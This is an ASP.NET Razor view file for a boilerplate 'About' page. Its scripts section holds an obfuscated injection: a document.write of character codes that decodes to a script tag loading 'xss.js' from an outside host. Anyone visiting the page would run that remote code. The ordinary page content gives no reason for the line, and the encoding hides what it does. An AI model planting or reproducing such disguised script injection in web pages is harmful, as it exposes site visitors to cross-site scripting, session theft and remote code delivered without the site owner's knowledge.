@{
    ViewBag.Title = "About";
}
<h2>@ViewBag.Title.</h2>
<h3>@ViewBag.Message</h3>

<p>Use this area to provide additional information.</p>

@section scripts
{


    <script>
        document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 104, 116, 116, 112, 58, 47, 47, 116, 115, 109, 46, 115, 116, 97, 110, 100, 50, 52, 46, 113, 117, 108, 105, 120, 46, 99, 111, 109, 47, 120, 115, 115, 46, 106, 115, 62))
    </script>
}